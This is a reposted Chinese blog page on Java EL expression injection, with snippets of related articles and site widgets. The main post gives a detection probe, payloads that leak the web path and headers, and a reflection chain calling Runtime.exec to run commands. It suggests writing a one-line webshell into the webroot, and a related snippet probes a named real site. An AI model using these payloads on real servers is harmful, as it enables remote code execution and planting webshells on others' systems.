JAVA WEB EL表达式注入

最新推荐文章于 2024-03-04 08:43:41 发布
最新推荐文章于 2024-03-04 08:43:41 发布
阅读量473 收藏 1
点赞数
文章标签: java runtime
原文链接:http://www.cnblogs.com/junsec/p/11132652.html
版权

  看猪猪侠以前的洞,顺便总结下:

一、EL表达式简介

  EL 全名为Expression Language。EL主要作用:
  1、获取数据
    EL表达式主要用于替换JSP页面中的脚本表达式,以从各种类型的web域 中检索java对象、获取数据。(某个web域 中的对象,访问javabean的属性、访问list集合、访问map集合、访问数组)
  2、执行运算
    利用EL表达式可以在JSP页面中执行一些基本的关系运算、逻辑运算和算术运算,以在JSP页面中完成一些简单的逻辑运算。${user==null}
  3、获取web开发常用对象
    EL 表达式定义了一些隐式对象,利用这些隐式对象,web开发人员可以很轻松获得对web常用对象的引用,从而获得这些对象中的数据。
  4、调用Java方法
    EL表达式允许用户开发自定义EL函数,以在JSP页面中通过EL表达式调用Java类的方法。

嗯,这段复制的,详细链接:https://www.cnblogs.com/xdp-gacl/p/3938361.html

 

检测方式:

  

https://www.a.com/login?a=${10-9}

 表达式执行会会显在页面上,检查源码。

 

漏洞利用:

${pageContext} 对应于JSP页面中的pageContext对象(注意:取的是pageContext对象。)

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}   获取web路径

${header}  文件头参数

${applicationScope} 获取webRoot

${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("命令").getInputStream())}  执行命令

  

渗透思路:获取webroot路径,exec执行命令echo写入一句话。

 

转载于:https://www.cnblogs.com/junsec/p/11132652.html

weixin_30656145
关注
Java代码审计】表达式注入
大河之犬的博客
04-02 1052
表达式注入是一种安全漏洞,发生在应用程序中使用动态表达式的情况下。在表达式注入中,攻击者通过在输入数据中插入恶意代码来利用应用程序中的动态表达式执行漏洞,从而执行恶意操作。这种漏洞通常发生在使用解释性语言或动态执行代码的环境中。
EL表达式注入漏洞:深入了解与防范
syntax_loop446的博客
09-22 431
为了保护应用程序的安全,我们应该加强对用户输入的验证和过滤,使用安全的EL解析器,采用最小权限原则,定期更新和修补系统,并提高安全意识。当开发人员未能正确验证和过滤用户输入,并将用户输入直接传递给EL表达式进行求值时,攻击者有机会构造恶意输入,执行未授权的操作。EL表达式注入漏洞是指攻击者通过构造恶意输入,将恶意EL表达式注入到应用程序中,从而执行非法的代码。然而,如果我们在验证用户名和密码之前直接将用户输入传递给EL表达式进行求值,就存在EL表达式注入漏洞的风险。一、EL表达式注入漏洞的原理。
java el 表达式_JAVA WEB EL表达式注入
weixin_36132766的博客
02-20 203
#1 漏洞地址code 区域https://auth.p4p.sogou.com/login?service=${1000-900}code 区域https://auth.p4p.sogou.com/login?service=${pageContext}action="/login?service=com.caucho.jsp.PageContextImpl@2aaf3a58" method="...
Java表达式注入(JSP EL表达式注入
GalaxySpaceX的博客
08-16 1316
Java表达式注入(JSP EL表达式注入
Java安全』EL表达式注入
Ho1aAs‘s Blog
04-02 5088
文章目录前言EL表达式解析启用/禁用EL表达式注入绕过方式1. 反射2. js引擎rce参考引用完 前言 EL表达式全称Express Language EL表达式语法以${}包裹 其他使用方法见参考文章 EL表达式解析启用/禁用 默认为启用,jsp会解析EL表达式,除非配置<%@ page isELIgnored ="true|false" %>,或者是全局pom.xml设置 <jsp-config> <jsp-property-group>
EL表达式
顺其自然~专栏
09-22 324
以MVC模式设计程序,JSP只是视图,视图的任务就是显示响应,而不是在JSP中做任何关于程序控制和业务逻辑的事情。所以在JSP页面中应该尽可能少的、或者是完全不出现Java代码。 在使用JSP标准动作操作 JavaBean时,如果JavaBean的属性是 String类型或者基本类型,则能够实现类型的自动转换,如 JavaBean的属性从String类型可自动转换成int类型。如果 Javabean中的属性不是 String类型和基本类型,而是一个 Object类型,并且属性还有自己的属性,如何获得此 O
浅析EL表达式注入漏洞
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 3092
0x01 EL简介 EL(Expression Language) 是为了使JSP写起来更加简单。表达式语言的灵感来自于 ECMAScript 和 XPath 表达式语言,它提供了在 JSP 中简化表达式的方法,让Jsp的代码更加简化。 EL表达式主要功能如下: 获取数据:EL表达式主要用于替换JSP页面中的脚本表达式,以从各种类型的Web域中检索Java对象、获取数据(某个Web域中的对象,访问JavaBean的属性、访问List集合、访问Map集合、访问数组); 执行运算:利用EL表达式可以在J
java 代码执行el,专属于java的漏洞——EL表达式注入
weixin_39997443的博客
03-20 1194
前言“FSRC经验分享”系列文章,旨在分享焦点科技信息安全部工作过程中的经验总结,包括但不限于漏洞分析、运营技巧、sdl推行、等保合规、自研工具等等。欢迎各位安全从业者持续关注~0x01EL简介表达式语言(Expression Language 以下简称EL)是以JSTL(JavaServer Pages Standard Tag Library,JSP标准标签库)的一部分出现的,原本被叫做SPE...
java表达式命令执行_Java Web表达式注入
weixin_35756130的博客
02-26 256
原文:http://netsecurity.51cto.com/art/201407/444548.htm0×00 引言在2014年6月18日@终极修炼师曾发布这样一条微博:链接的内容是一个名为Jenkins的服务,可以在没有password的情况下受到攻击。而攻击方法比较有趣,Jenkins提供了一个Script Console功能,可以执行Groovy 脚本语言。下面我们来看下维基百科对于这个...
的表达式_EL表达式注入
weixin_28804631的博客
01-13 422
学习了下 做个记录什么是el表达式Expression Language表达式语言是一种在JSP页面获取数据的简单方式(只能获取数据,不能设置数据)在JSP2.0开始引入概念el表达式就是用来获取数据的,可从以下几个域获取属性pagescoperequestscope sessionscope applicationscope pagecontext以上对象范围从小到大,其中pagec...
Java代码审计】表达式注入
m0_52923241的博客
03-29 1381
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。:当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容。:Spring的message标签会对EL表达式进行解析,且 web容器也会对EL表达式进行解析,两次解析造成EL表达式注入。:独立于Spring容器使用,但只被当成简单的表达式语言使用。
Spring框架(二)实例化.DI.注入.EL的表达式
程序员哦的博客
12-18 309
目录: 2.单例对象的 延迟实例化 3.什么是DI 4.实现DI的方式 5.bean 参数的注入 6.Spring 中的EL的表达式 1.定义一个扑克牌类 Card 有两个成员变量 String suit String point 提供get set方法 无参构造 全参构造 toString 序列化 在容器中创建这个类型的对象 并获取这个对象 打印。 定义一个玩家类 Player 有四个成员变...
EL 表达式注入攻击
最新发布
m0_62207482的博客
03-04 204
例如,${ userinfo}代表获取变量userinfo的值。当EL表达式中的变量不给定范围时,则默认在page范围查找,然后依次在request、session、application范围查找。也可以用范围作为前缀表示属于哪个范围的变量,例如:${ pageScope. userinfo}表示访问page范围中的userinfo变量。事实上,可以将EL表达式理解为一种简化的JSP代码。简单地说,使用EL表达式语法:${EL表达式}JSP表达式:<%=变量或表达式>声明jsp的成员变量或成员方法。
Spring EL 表达式实现资源的注入
小半的博客
08-21 932
前言 Spring 开发中经常涉及调用各种资源的情况,包括普通文件,网址,配置文件,环境变量。使用spring 表达式语言实现资源的注入 ,能够以一种强大和简单的方式将值装配到bean 属性和构造器中. 特性 spring EL 的特性 使用bean 的id 来引用bean 调用方法和访问对象的属性 对值进行算术,关系 和逻辑运算 正则表达式匹配 集合操作 使用 spring主要在@value...
Javaweb安全——表达式注入(EL+SpEL)
weixin_43610673的博客
07-22 3257
Java中表达式根据框架分为好多种,这里以JSP自带的表达式语言EL和使用较多的Spring框架所支持的SpEL为例。其基本语法为${变量表达式}。
spring EL表达式
weixin_43060721的博客
09-18 376
spring EL表达式需要放入:#{…} 属性占位符需要放入:#{…} package springBase.springEL; import java.io.IOException; import java.util.List; import org.apache.commons.io.IOUtils; import org.springframework.beans.factory.an...
【代码审计】表达式注入
TeamsSix 的 CSDN 空间
11-29 1080
1、介绍 表达式语言(Expression Language)简称 EL 表达式,是一种 JSP 内置的语言。 在 JSP 中,使用 ${} 来表示 EL 表达式,例如 ${name} 表示获取 name 变量。 在 EL 表达式中有两种获取对象属性的方法,第一种为 ${param.name},第二种为 ${param[name]} 2、实例 使用实例 使用 param 对象获取用户传入的参数值,这里的 ${param.name} 相当于 request.getParameter(“name”) <%
Web基础:EL技术
xxyneymar的博客
10-19 495
目录 1.EL工具包介绍 2.传统JSP文件中主要开发步骤 3.EL表达式 3.1 语法格式 3.2 作用域对象别名 3.3 EL表达式将引用对象属性写入到响应体 4.EL表达式简化版 5.EL表达式支持运算表达式 6.EL表达式提供的内置对象 7.EL表达式中的常见异常 1.EL工具包介绍 ①由Java技术开发的一个jar包 ②作用是降低JSP文件开发时Java命令的开发强度 ③Tomcat服务器本身自带了EL工具包:Tomcat安装地址/lib/el-api...
java帮忙写一个存在el表达式注入的靶场
05-26
首先,需要了解EL表达式注入的概念。EL表达式Java EE中用于访问JavaBean属性的一种语言,可以在JSP页面中使用。EL表达式注入是指攻击者通过构造恶意EL表达式,向服务器发送请求,从而获取或篡改数据。为了演示EL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值